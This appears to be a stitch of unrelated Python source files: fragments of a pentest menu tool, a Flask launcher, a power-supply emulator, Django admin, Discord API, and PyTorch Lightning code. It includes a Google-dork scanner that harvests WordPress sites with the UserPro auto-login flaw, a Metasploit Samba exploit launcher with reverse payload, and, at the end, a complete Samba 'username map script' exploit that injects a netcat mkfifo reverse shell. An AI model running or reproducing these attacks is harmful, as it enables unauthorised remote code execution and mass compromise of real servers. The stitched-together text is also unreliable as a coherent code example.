elif dir =='back':
core.menu.post()
elif dir == 'set target':
ym = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/dir_search "+G+"(set target)"+N+"): "))
print(("target => "+R+"",ym))
puki = eval(input("Pentest>> ("+B+"modules/post)("+R+"post/dir_search "+G+"(set extensions)"+N+"): "))
dih = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/dir_search"+N+"): "))
if dih == "run":
os.system("python mpdules/dirsearch/dirsearch.py -u %s -e %s" % (ym,puki))
print((""+B+"[*]"+N+" Job finished!"))
print()
dirse()
else:
dirse()
elif dir =='clear':
clean()
dirse()
elif dir =='exit':
print()
print((""+G+"Thanks for using PXXTF"))
print()
exit()
else:
print(("Wrong Command => ", dir))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
dirse()
pass
def xss():
while True:
cs = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/cms_war "+N+"): "))
if cs == 'show options':
help.option()
xss()
elif cs == 'set target':
tops = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/cms_war "+G+"(set target)"+N+"): "))
print(("target =>"+R+"" ,tops))
gay = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/cms_war"+N+"): "))
if gay == "run":
print((""+B+"[*]"+N+" Starting attacks Scanning..."))
os.system("cd modules;cd xsspy;python XssPy.py -u %s -v" % (tops))
print((""+B+"[*]"+N+" Job finished!"))
print()
xss()
else:
xss()
elif cs =='back':
core.menu.post()
elif cs =='clear':
clean()
xss()
elif cs =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
else:
print(("Wrong Command => ", cs))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
xss()
pass
def wordpress():
while True:
wor = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/usr_pro_wordpress_auto_find"+N+"): "))
if wor == 'show options':
print("Name Description")
print("===== =============")
print("set target start target")
print("back back to menu")
wordpress()
elif wor == 'back':
core.menu.post()
elif wor == 'set target':
def tracker(keywords, start):
searchQuery = quote(keywords, safe='') # This line makes the script Support all encodings
try:
url = "https://www.google.com/search?gl=ir&num=100&start=" + str(
start) + "&pws=0&as_qdr=all&dcr=0&q=" + searchQuery
req = Request(url) # Sets the SERPs URL!!
except timeout:
print("Connection timed out!")
req.add_header('User-Agent',
'userpro1 aef by orm')
serpURL = urlopen(req).read() # Opens and Reads The Serp Page
soup = bs4.BeautifulSoup(serpURL, "html.parser") # Sets the Serp URL On Soup
allResults = [] # An Empty Array to Save the Results
i=0
for hit in soup.findAll('cite'): # a for-each loop, to check all <cite ....> Elements in Page
# if the domain was between <cite> and </cite>
allResults.append(
str("")+hit.text) # Results will add to allResults
i=i+1
if (len(allResults) == 0):
return(""+R+"[!] "+N+"No result found for this keyword => " + keywords)
else:
print((""+B+"[*]"+N+" Ok! Starting... \n"))
for element in allResults: # Prints all the results
if (element.startswith("http://")):
element = element[7:]
if (element.startswith("https://")):
element = element[8:]
if (element.startswith("www.")):
element = element[4:]
element=element[:element.find("/")]
element="http://"+element
print(("checking "+element+" :"))
if (checkwp(element)):
suc = str(checkVul(element))
if( suc=="True"):
try:
filee = open("priv8.txt", mode="a+")
filee.write(element+"\n")
filee.close()
except:
print((""+R+"error"+N+""))
print (suc)
else:
print((""+R+"False"+N+""))
else:
print((element + ""+R+" =>"+N+" " + str(checkwp(element))))
def checkwp(url):
url+="/wp-content/plugins/userpro/css/userpro.min.css"
try:
pURL = urlopen(url).read()
except:
return False
if (pURL.find(".userpro")>-1):
print((""+B+"[!] "+N+" Plugin is installed checking vulnerable...\n"))
return True
else:
return False
def checkVul(url):
url1=url + "/?up_auto_log=true"
try:
pURL = urlopen(url1).read()
if (pURL.find("admin-bar-css")>-1):
return True
elif (urlopen(url + "/wp-admin").read().find("admin-bar-css")>-1):
return True
else :return False
except:
return False
while(True):
x = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/usr_pro_wordpress_auto_find (set Dork)"+N+"): "))
print(("DORKS => "+R+"",x))
n= eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/usr_pro_wordpress_auto_find (start number)"+N+"): "))
print(("START NUMBER => "+R+"",n))
g= eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/usr_pro_wordpress_auto_find (set end_number)"+N+"): "))
print(("END NUMBER => "+R+"",g))
run = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/usr_pro_wordpress_auto_find"+N+"): "))
if run == "run":
print((""+B+"[*] "+N+"Starting attacks..."))
while(True):
tracker(x, n)
y=eval(input(""+B+"[*]"+N+" Next (y/n)?"))
if(y=="y"):
n+=g;
tracker(x, n)
else:
core.menu.scan()
y1=eval(input(""+B+"[*]"+N+" Anouther dork (y/n) ?"))
if (y1 == "y"):
continue
else:
core.menu.scan()
elif wor == 'clear':
clean()
wordpress()
elif wor =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
else:
print(("Wrong Command => ", wor))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
wordpress()
pass
def android():
while True:
dd = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/android_remote_acces"+N+"): "))
if dd == 'show options':
help.option()
android()
elif dd =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
elif dd == "back":
core.menu.post()
elif dd == 'set target':
os.system("cd modules;cd android;python2 android.py")
android()
elif dd == 'clear':
clean()
android()
else:
print(("Wrong Command => ", dd))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
android()
def vb():
while True:
list = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/vbulletin"+N+"): "))
if list == 'show options':
help.option()
vb()
elif list =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
elif list == "back":
core.menu.post()
elif list == 'set target':
go = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/vbulletin (vbulletin$)"+N+"): "))
print(("target =>"+R+"",go))
se = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/vbulletin (vbulletin$)"+N+"): "))
if se == "run":
os.system('python modules/vbulletin/vb.py %s' % (go))
vb()
elif se =='back':
core.menu.post()
elif list == 'clear':
clean()
vb()
else:
print(("Wrong Command => ", list))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
vb()
def num():
while True:
list = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/enumeration"+N+"): "))
if list == 'show options':
help.option()
num()
elif list =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
elif list == "back":
core.menu.post()
elif list == 'set target':
go = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/enumeration "+G+"(set target IP/domain)"+N+"): "))
print()
print(' command Descriptions ')
print(' --------- ----------------')
print((" target =>"+R+"",go))
print(' --------------------------------------')
print(' run Start attack')
print(' back back ')
print()
se = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/enumeration "+G+"(set target IP/domain)"+N+"): "))
if se == "run":
os.system('python modules/enum/http-enum.py -t %s' % (go))
num()
elif se =='back':
core.menu.post()
elif list == 'clear':
clean()
num()
else:
print(("Wrong Command => ", list))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
num()
def smb():
while True:
map =eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/samba"+N+"): "))
if map == 'show options':
help.option()
smb()
elif map =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
elif map == 'back':
core.menu.postex()
elif map =='set target':
rhost =eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/samba "+G+"(set RHOST)"+N+"): "))
print(("RHOST =>",rhost))
rport =eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/samba "+G+"(set RPORT)"+N+"): "))
print(("RPORT =>",rport))
lhost =eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/samba "+G+"(set LHOST)"+N+"): "))
print(('LHOST =>',lhost))
lport =eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/samba "+G+"(set LPORT)"+N+"): "))
print(('LPORT =>',lport))
her =eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/samba "+N+"): "))
if her =='run':
os.system('msfconsole -q -x "use exploit/multi/samba/usermap_script; set RHOST %s ; set RPORT %s ; set payload cmd/unix/reverse ; set LHOST %s ; set LPORT %s ; run "' % (rhost, rport, lhost, lport))
print()
smb()
elif map =='clear':
clean()
smb()
else:
print(("Wrong Command => ", map))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
smb()
def aix_hashdump():
while True:
cs = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/aix_hashdump "+N+"): "))
if cs == 'show options':
help.option()
aix_hashdump()
elif cs == 'set target':
os.system('msfconsole -q -x "use use post/aix/hashdump; show options" ')
print()
aix_hashdump()
elif cs =='back':
core.menu.post()
elif cs =='clear':
clean()
aix_hashdump()
elif cs =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
else:
print(("Wrong Command => ", cs))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
aix_hashdump()
pass
| StarcoderdataPython |
110239 | <gh_stars>1-10
#!/usr/bin/env python
from application import router
if __name__ == '__main__':
router.app.run(host="0.0.0.0", port=8000, debug=True)
| StarcoderdataPython |
1679221 | <reponame>vanminhdev/kcsg
from queue import Queue
from threading import Timer
class ScanningMonitor:
scanning_interval = 5
local_interval = 5
changed_quantity = {
'old': 0,
'now': 0
}
max_size_queue = 3
last_times_v = Queue(max_size_queue)
@staticmethod
def check_changed_items():
now = ScanningMonitor.changed_quantity['now']
old = ScanningMonitor.changed_quantity['old']
ScanningMonitor.changed_quantity['now'] = 0
ScanningMonitor.changed_quantity['old'] = now
f1 = now
f2 = old
v = 0 if f1 == 0 and f2 == 0 else abs(f1 - f2) / (f1 + f2)
print('f1, f2, v: ' + str(f1) + ' ' + str(f2) + ' ' + str(v))
if ScanningMonitor.last_times_v.full():
ScanningMonitor.last_times_v.get()
ScanningMonitor.last_times_v.put(v)
print(list(ScanningMonitor.last_times_v.queue))
print('Queue: ')
print(list(ScanningMonitor.last_times_v.queue))
list_v = list(ScanningMonitor.last_times_v.queue)
pivot = sum(list_v) / ScanningMonitor.max_size_queue
ScanningMonitor.update_scanning_interval(pivot)
@staticmethod
def update_scanning_interval(pivot):
if pivot > 0.6:
ScanningMonitor.scanning_interval = 3
elif pivot < 0.4:
ScanningMonitor.scanning_interval = 10
elif 0.4 <= pivot <= 0.6:
ScanningMonitor.scanning_interval = 5
print('interval: ' + str(ScanningMonitor.scanning_interval))
@staticmethod
def start():
print('CHECKING CHANGED ITEMS...')
ScanningMonitor.check_changed_items()
Timer(ScanningMonitor.local_interval, ScanningMonitor.start).start()
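# Example (sketch): bump the counter whenever an item changes, then start the
# adaptive polling loop once; it reschedules itself every `local_interval` seconds.
#   ScanningMonitor.changed_quantity['now'] += 1
#   ScanningMonitor.start()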
| StarcoderdataPython |
3306128 | <reponame>ISISComputingGroup/EPICS-DeviceEmulator
from collections import OrderedDict
from .states import DefaultState
from lewis.devices import StateMachineDevice
from random import random as rnd
class SimulatedTtiplp(StateMachineDevice):
def _initialize_data(self):
"""
Initialize all of the device's attributes.
"""
self.ident = "<NAME>, PL303-P, 490296, 3.02-4.06"
self.volt = 0
self.volt_sp = 0
self.curr = 0
self.curr_sp = 0
self.output = 0
self.overvolt = 0
self.overcurr = 0
def reset(self):
self._initialize_data()
def _get_state_handlers(self):
return {
'default': DefaultState(),
}
def _get_initial_state(self):
return 'default'
def _get_transition_handlers(self):
return OrderedDict([
])
def get_volt(self):
if self.output == 1:
self.volt = self.volt_sp + ((rnd()-0.5)/1000)
else:
self.volt = ((rnd()-0.5)/1000)
return self.volt
def get_curr(self):
if self.output == 1:
self.curr = self.curr_sp+((rnd()-0.5)/1000)
else:
self.curr = ((rnd()-0.5)/1000)
return self.curr
def set_volt_sp(self, volt_sp):
self.volt_sp = float(volt_sp)
if float(volt_sp) > float(self.overvolt):
self.output = 0
self.volt = 0
self.curr = 0
def set_curr_sp(self, curr_sp):
self.curr_sp = float(curr_sp)
if float(curr_sp) > float(self.overcurr):
self.output = 0
self.volt = 0
            self.curr = 0
def set_overvolt(self,overvolt):
self.overvolt = float(overvolt)
if float(overvolt) < self.volt_sp:
self.volt = 0
self.curr = 0
self.output = 0
def set_overcurr(self,overcurr):
self.overcurr = float(overcurr)
if float(overcurr) < self.curr_sp:
self.volt = 0
self.curr = 0
self.output = 0
def set_output(self,output):
if (self.volt_sp <= self.overvolt) and (self.curr_sp <= self.overcurr) and int(output) == 1:
self.output = 1
else:
self.output = 0
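
# Illustrative interaction sketch (not from the original emulator): the device is
# normally driven through Lewis, and constructing SimulatedTtiplp directly may need
# extra StateMachineDevice setup, so the snippet below is indicative only.
#
#   psu = SimulatedTtiplp()
#   psu.set_overvolt(10)     # over-voltage trip level
#   psu.set_volt_sp(5)       # setpoint below the trip level
#   psu.set_output(1)        # output switches on because both limits are respected
#   print(psu.get_volt())    # ~5 V with a small simulated ripple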
| StarcoderdataPython |
165132 | # coding: utf-8
from django.contrib import admin
from django.utils.safestring import SafeString as _S
from django.utils.html import format_html
from ordered_model.admin import OrderedModelAdmin
from ordered_model.admin import OrderedTabularInline
from mptt.admin import MPTTModelAdmin
from mptt.forms import TreeNodeChoiceField
from . import models, forms
class ThumbnailAdminInline(admin.TabularInline):
model = models.Thumbnail
def image_tag(self, obj):
if obj.data:
return format_html('<img src="{}" width="100px"/>'.format(
obj.data.url))
image_tag.short_description = 'Image'
extra = 1
readonly_fields = ['image_tag', ]
@admin.register(models.MediaFile)
class MediaFileAdmin(admin.ModelAdmin):
def image_tag(self, obj):
if hasattr(obj, 'imagemeta'):
return format_html('<img src="{}" width="100px"/>'.format(
obj.data.url))
image_tag.short_description = 'Image'
list_display = ['id', 'image_tag', 'data', 'access', 'owner', 'media_type', ]
inlines = [ThumbnailAdminInline]
readonly_fields = ['image_tag', ]
@admin.register(models.ImageMeta)
class ImageMetaAdmin(admin.ModelAdmin):
list_display = ['id', 'width', 'height', 'info', ]
raw_id_fields = ['image', ]
@admin.register(models.ThumbnailProfile)
class ThumbnailProfileAdmin(OrderedModelAdmin):
list_display = ['id', 'order', 'name', 'width', 'height', 'info', 'move_up_down_links', ]
@admin.register(models.Thumbnail)
class ThumbnailAdmin(admin.ModelAdmin):
list_display = ['id', 'image', 'data', ]
raw_id_fields = ['image', ]
@admin.register(models.Path)
class PathAdmin(MPTTModelAdmin):
pass
@admin.register(models.StaticFile)
class StaticFileAdmin(admin.ModelAdmin):
form = forms.StaticFileForm
list_display = ['id', 'full_path', 'basename', ]
readonly_fields = ['full_path', 'link', ]
def link(self, obj):
return _S('<a href="{u}">{u}</a>'.format(u=obj.url))
class AlbumFileAdminInline(OrderedTabularInline):
def image_tag(self, obj):
if obj.mediafile and hasattr(obj.mediafile, 'imagemeta'):
return format_html('<img src="{}" width="100px"/>'.format(
obj.mediafile.data.url))
image_tag.short_description = 'Image'
model = models.AlbumFile
extra = 1
raw_id_fields = ['mediafile', ]
readonly_fields = ['image_tag', 'order', 'move_up_down_links', ]
@admin.register(models.Album)
class AlbumAdmin(admin.ModelAdmin):
inlines = [AlbumFileAdminInline, ]
list_display = ['id', 'owner', 'title', ]
raw_id_fields = ['owner', ]
def get_urls(self):
urls = super(AlbumAdmin, self).get_urls()
for inline in self.inlines:
if hasattr(inline, 'get_urls'):
urls = inline.get_urls(self) + urls
return urls
| StarcoderdataPython |
1746533 | from typing import TYPE_CHECKING, Any
from dis_snek.const import MISSING, Absent
from dis_snek.models.route import Route
from dis_snek.utils.serializer import dict_filter_missing
if TYPE_CHECKING:
from dis_snek.models.snowflake import Snowflake_Type
class ReactionRequests:
request: Any
async def create_reaction(self, channel_id: "Snowflake_Type", message_id: "Snowflake_Type", emoji: str) -> None:
"""
Create a reaction for a message.
parameters:
channel_id: The channel this is taking place in
            message_id: The message to create a reaction on
emoji: The emoji to use (format: `name:id`)
"""
return await self.request(
Route(
"PUT",
"/channels/{channel_id}/messages/{message_id}/reactions/{emoji}/@me",
channel_id=channel_id,
message_id=message_id,
emoji=emoji,
)
)
async def remove_self_reaction(
self, channel_id: "Snowflake_Type", message_id: "Snowflake_Type", emoji: str
) -> None:
"""
Remove client's reaction from a message
parameters:
channel_id: The channel this is taking place in.
message_id: The message to remove the reaction on.
emoji: The emoji to remove. (format: `name:id`)
"""
return await self.request(
Route(
"DELETE",
"/channels/{channel_id}/messages/{message_id}/reactions/{emoji}/@me",
channel_id=channel_id,
message_id=message_id,
emoji=emoji,
)
)
async def remove_user_reaction(
self, channel_id: "Snowflake_Type", message_id: "Snowflake_Type", emoji: str, user_id: "Snowflake_Type"
) -> None:
"""
Remove user's reaction from a message
parameters:
channel_id: The channel this is taking place in
message_id: The message to remove the reaction on.
emoji: The emoji to remove. (format: `name:id`)
user_id: The user to remove reaction of.
"""
return await self.request(
Route(
"DELETE",
"/channels/{channel_id}/messages/{message_id}/reactions/{emoji}/{user_id}",
channel_id=channel_id,
message_id=message_id,
emoji=emoji,
user_id=user_id,
)
)
async def clear_reaction(self, channel_id: "Snowflake_Type", message_id: "Snowflake_Type", emoji: str) -> None:
"""
Remove specific reaction from a message
parameters:
channel_id: The channel this is taking place in.
message_id: The message to remove the reaction on.
emoji: The emoji to remove. (format: `name:id`)
"""
return await self.request(
Route(
"DELETE",
"/channels/{channel_id}/messages/{message_id}/reactions/{emoji}",
channel_id=channel_id,
message_id=message_id,
emoji=emoji,
)
)
async def clear_reactions(self, channel_id: "Snowflake_Type", message_id: "Snowflake_Type") -> None:
"""
Remove reactions from a message.
parameters:
channel_id: The channel this is taking place in.
message_id: The message to clear reactions from.
"""
return await self.request(Route("DELETE", f"/channels/{channel_id}/messages/{message_id}/reactions"))
async def get_reactions(
self,
channel_id: "Snowflake_Type",
message_id: "Snowflake_Type",
emoji: str,
limit: Absent[int] = MISSING,
after: "Snowflake_Type" = MISSING,
) -> list:
"""
Gets specific reaction from a message
parameters:
channel_id: The channel this is taking place in.
message_id: The message to get the reaction.
emoji: The emoji to get. (format: `name:id`)
"""
return await self.request(
Route(
"GET",
"/channels/{channel_id}/messages/{message_id}/reactions/{emoji}",
channel_id=channel_id,
message_id=message_id,
emoji=emoji,
),
params=dict_filter_missing(dict(limit=limit, after=after)),
)
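
# Hedged usage sketch (not part of dis_snek): ReactionRequests is a mixin, so it only
# works when combined with the HTTP client that supplies ``self.request``. The stub
# below is purely illustrative.
#
#   class FakeHTTP(ReactionRequests):
#       async def request(self, route, **kwargs):
#           print(route, kwargs)   # a real client would hit Discord's API here
#
#   # await FakeHTTP().create_reaction(channel_id, message_id, "custom_emoji:1234")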
| StarcoderdataPython |
1634944 | <reponame>Fireman730/python-eveng-api
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Description ...
"""
__author__ = "<NAME>"
__maintainer__ = "<NAME>"
__version__ = "1.0"
__email__ = "<EMAIL>"
__status__ = "Production"
__copyright__ = "Copyright 2019"
__license__ = "MIT"
######################################################
#
# Default value used for exit()
#
EXIT_SUCCESS = 0
EXIT_FAILURE = 1
######################################################
#
# Import Library
#
######################################################
#
# Import Library
#
try:
from os import listdir
from os.path import isfile, join
except ImportError as importError:
print("Error import listdir")
print(importError)
exit(EXIT_FAILURE)
try:
import yaml
except ImportError as importError:
print("Error import yaml")
print(importError)
exit(EXIT_FAILURE)
try:
import paramiko
except ImportError as importError:
print("Error import paramiko")
print(importError)
exit(EXIT_FAILURE)
try:
import devices.abstract_device
except ImportError as importError:
print("Error import abc - Cumulus abstractmethod")
print(importError)
exit(EXIT_FAILURE)
try:
from exceptions.EveExceptions import EVENG_Exception
except ImportError as importError:
print("Error import listdir")
print(importError)
exit(EXIT_FAILURE)
######################################################
#
# Constantes
#
######################################################
#
# Class
#
class JuniperDevice(devices.abstract_device.DeviceQEMUAbstract):
    """Juniper QEMU device support is not implemented yet."""

    def __init__(self, *args, **kwargs):
        raise NotImplementedError("JuniperDevice is not implemented yet")
| StarcoderdataPython |
67087 | <filename>openproblems/api/load.py
from . import utils
def load_dataset(task_name, function_name, test):
"""Load a dataset for a task."""
fun = utils.get_function(task_name, "datasets", function_name)
return fun(test=test)
def main(args):
"""Run the ``load`` subcommand."""
adata = load_dataset(args.task, args.name, args.test)
adata.write_h5ad(args.output)
| StarcoderdataPython |
3210645 | <reponame>stas00/pytorch-lightning
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from pytorch_lightning.utilities import rank_zero_info, rank_zero_only, rank_zero_warn
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from pytorch_lightning import _logger as log
try:
import torch_xla
import torch_xla.core.xla_model as xm
import torch_xla.distributed.xla_multiprocessing as xmp
except ImportError:
XLA_AVAILABLE = False
else:
XLA_AVAILABLE = True
class TPUBackend(object):
def __init__(self, trainer):
self.trainer = trainer
self.start_method = None
def setup(self):
rank_zero_info(f'training on {self.trainer.tpu_cores} TPU cores')
if not XLA_AVAILABLE:
raise MisconfigurationException('No TPU devices found.')
# COLAB_GPU is an env var available by default in Colab environments.
self.start_method = 'fork' if self.trainer.on_colab_kaggle else 'spawn'
def teardown(self):
# when training completes, load the weights back in main process
self.__load_weights_on_main_process()
def train(self, model):
self.trainer.model = model
# train
if self.trainer.tpu_id is not None:
self.tpu_train_in_process(self.trainer.tpu_id, model)
else:
xmp.spawn(
self.tpu_train_in_process,
args=(model,),
nprocs=self.trainer.tpu_cores,
start_method=self.start_method
)
def __load_weights_on_main_process(self):
model = self.trainer.model
# load weights if not interrupted
if self.trainer.on_colab_kaggle and not self.trainer.testing:
self.trainer.load_spawn_weights(model)
self.trainer.model = model
def tpu_train_in_process(self, tpu_core_idx, model):
"""
Here we are inside each individual process
"""
if not self.trainer.testing:
self.trainer.setup('fit')
model.setup('fit')
# setup TPU training
self.__setup_tpu_training(model)
# Run the pretrain routine
self.trainer.run_pretrain_routine(model)
# save weights at the end of training
self.__save_end_of_training_weights(model)
def __save_end_of_training_weights(self, model):
# when training ends on these platforms dump weights to get out of the main process
if self.trainer.on_colab_kaggle:
rank_zero_warn('cleaning up... please do not interrupt')
self.trainer.save_spawn_weights(model)
def __setup_tpu_training(self, model):
# use the default device from the process
tpu_device = xm.xla_device()
# if given an ordinal device, use this as the device
if self.trainer.tpu_id is not None:
tpu_device = xm.xla_device(self.trainer.tpu_id)
# track the device and move model to it
self.trainer._device = tpu_device
model.to(self.trainer._device)
# get the appropriate tpu ranks
self.trainer.tpu_local_core_rank = xm.get_local_ordinal()
self.trainer.tpu_global_core_rank = xm.get_ordinal()
# avoid duplicating progress bar
if self.trainer.tpu_global_core_rank != 0 and self.trainer.progress_bar_callback is not None:
self.trainer.progress_bar_callback.disable()
self.trainer.global_rank = self.trainer.tpu_local_core_rank
rank_zero_only.rank = self.trainer.global_rank
# CHOOSE OPTIMIZER
# allow for lr schedulers as well
optimizers, lr_schedulers, optimizer_frequencies = self.trainer.init_optimizers(model)
self.trainer.optimizers = optimizers
self.trainer.lr_schedulers = lr_schedulers
self.trainer.optimizer_frequencies = optimizer_frequencies
# init 16 bit for TPU
if self.trainer.precision == 16:
os.environ['XLA_USE_BF16'] = str(1)
log.info(f'INIT TPU local core: {self.trainer.tpu_local_core_rank},'
f' global rank: {self.trainer.tpu_global_core_rank}')
| StarcoderdataPython |
3395089 | <gh_stars>0
#!/usr/bin/env python3
def print_hello():
print("Hello!")
| StarcoderdataPython |
188742 | import json
import mimetypes
import os
from aws_xray_sdk.core import patch
import boto3
from boto3.dynamodb.conditions import Key
from botocore.client import Config
patch(["boto3"])
TABLE_NAME = os.getenv('TABLE_NAME')
NOT_FOUND = {
"isBase64Encoded": False,
"statusCode": 404,
"body": json.dumps({'message': "Not Found"}),
"headers": {
"Content-Type": "application/json"
},
}
session = boto3.Session()
dynamodb = session.resource('dynamodb').Table(TABLE_NAME)
def lambda_handler(event, context):
client_token_claims = event['requestContext']['authorizer']['claims']
sha = event['pathParameters']['sha']
    try:
        size = event['queryStringParameters']['size']
    except (KeyError, TypeError):
        size = 0
link_response = dynamodb.query(
Select='COUNT',
KeyConditionExpression=
Key('pk').eq(client_token_claims['client_id']) & Key('sk').begins_with(sha)
)
if link_response['Count'] == 0:
return NOT_FOUND
image_response = dynamodb.get_item(Key={'pk': 'IMAGE', 'sk': sha})
extension = mimetypes.guess_extension(image_response['Item']['mimetype'])
key_path = os.path.join('images', sha, f"{size}{extension}")
s3_client = session.client(
's3',
region_name=image_response['Item']['origin_region'],
config=Config(signature_version='s3v4')
)
try:
s3_client.head_object(Bucket=image_response['Item']['origin_bucket'], Key=key_path)
except:
return NOT_FOUND
presigned_url = s3_client.generate_presigned_url(
ClientMethod='get_object',
Params={
'Bucket': image_response['Item']['origin_bucket'],
'Key': key_path
},
ExpiresIn=60
)
return {
"isBase64Encoded": False,
"statusCode": 200,
"body": json.dumps(
{
"message": "Success!",
"path": event['path'],
"method": event['httpMethod'],
"token_claims": event['requestContext']['authorizer']['claims'],
"download_url": presigned_url
}
),
"headers": {
"Content-Type": "application/json"
},
}
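
# Local smoke-test sketch (not part of the deployed function): the claim keys, sha
# and size below are made-up values that only illustrate the expected event shape.
if __name__ == '__main__':
    fake_event = {
        'requestContext': {'authorizer': {'claims': {'client_id': 'example-client'}}},
        'pathParameters': {'sha': 'deadbeef'},
        'queryStringParameters': {'size': '128'},
        'path': '/images/deadbeef',
        'httpMethod': 'GET',
    }
    # lambda_handler(fake_event, None)  # needs real AWS credentials, table and bucket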
| StarcoderdataPython |
102330 | l, r = map(int, input().split())
mod = 10 ** 9 + 7
def f(x):
if x == 0:
return 0
res = 1
cnt = 2
f = 1
b_s = 2
e_s = 4
b_f = 3
e_f = 9
x -= 1
while x > 0:
if f:
res += cnt * (b_s + e_s) // 2
b_s = e_s + 2
e_s = e_s + 2 * (4 * cnt)
else:
res += cnt * (b_f + e_f) // 2
b_f = e_f + 2
e_f = e_f + 2 * (4 * cnt)
x -= cnt
if x < 0:
if f:
b_s -= 2
res -= abs(x) * (b_s + b_s - abs(x + 1) * 2) // 2
else:
b_f -= 2
res -= abs(x) * (b_f + b_f - abs(x + 1) * 2) // 2
cnt *= 2
f = 1 - f
return res
print((f(r) - f(l - 1)) % mod)
| StarcoderdataPython |
3246984 | <filename>test/core/plugins/__init__.py
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# author: <EMAIL>
# datetime: 2021/10/22 下午2:56
# project: DongTai-engine
| StarcoderdataPython |
3328712 | <gh_stars>1-10
#!/usr/bin/python2
#-*- coding:utf-8 -*-
#Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution
import os
import time
import socket
import platform
import sys
import threading
try:
from datetime import datetime
except ImportError:
print("[*] Module Datetime Not Found !")
try:
from smb.SMBConnection import SMBConnection
except ImportError:
print("[*] Module SMB Not Found !")
try:
import nclib
except ImportError:
print("[*] Module NCLIB Not Found !")
banner = '''
\033[32m
_______ _______ ______ _ _ _______ _______ _____
|______ | | | |_____] | | | | | |_____| |_____]
______| | | | |_____] |_____| | | | | | |
User Map Script Remote Command Injection
Created By Unam3dd
Github : \033[31mUnam3dd\033[32m
Instagram : \033[31munam3dd
\033[00m
'''
PAYLOAD_REVERSE_SHELL = "mkfifo /tmp/ffuw; nc 192.168.1.71 4444 0</tmp/ffuw | /bin/sh >/tmp/ffuw 2>&1; rm /tmp/ffuw"
def platform_required():
if 'Linux' not in platform.platform():
sys.exit("[*] Linux Required !")
def py_version_required():
if sys.version[0] =="3":
sys.exit("[*] Please Use Python2.7 For This Script !")
def check_port(ip,port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip,int(port)))
return True
except:
return False
def sending_exploit(ip,port,command):
userid = "/=`nohup " +command.encode("utf-8") + "`"
password = "<PASSWORD>"
try:
conn = SMBConnection(userid,password,"<PASSWORD>","WORLD", use_ntlm_v2 = False)
conn.connect(ip,int(port))
return True
except:
return False
if __name__ == '__main__':
platform_required()
py_version_required()
if len(sys.argv) <3:
print(banner)
print("usage : %s cmd <rhost> <rport> <payload_command>" % (sys.argv[0]))
print(" %s reverse_shell <rhost> <rport> <lhost> <lport>" % (sys.argv[0]))
else:
print(banner)
if sys.argv[1] =="cmd":
if check_port(sys.argv[2],sys.argv[3]) ==True:
print("\033[32m[\033[34m+\033[32m] SMB Service Found !")
print("\033[32m[\033[34m+\033[32m] Payload Injected !")
sending_exploit(sys.argv[2],sys.argv[3],sys.argv[4])
else:
print("\033[32m[\033[31m-\033[32m] SMB Service Not Found !")
elif sys.argv[1] =="reverse_shell":
if check_port(sys.argv[2],sys.argv[3]) ==True:
print("\033[32m[\033[34m+\033[32m] SMB Service Found !")
print("\033[32m[\033[34m+\033[32m] Reverse Shell Injected Reversed On => %s:%s " % (sys.argv[4],sys.argv[5]))
reverse_shell = PAYLOAD_REVERSE_SHELL
reverse_shell = reverse_shell.replace("192.168.1.71",sys.argv[4])
reverse_shell = reverse_shell.replace("4444",sys.argv[5])
sending_exploit(sys.argv[2],sys.argv[3],reverse_shell)
else:
print("\033[32m[\033[31m-\033[32m] SMB Service Not Found !") | StarcoderdataPython |
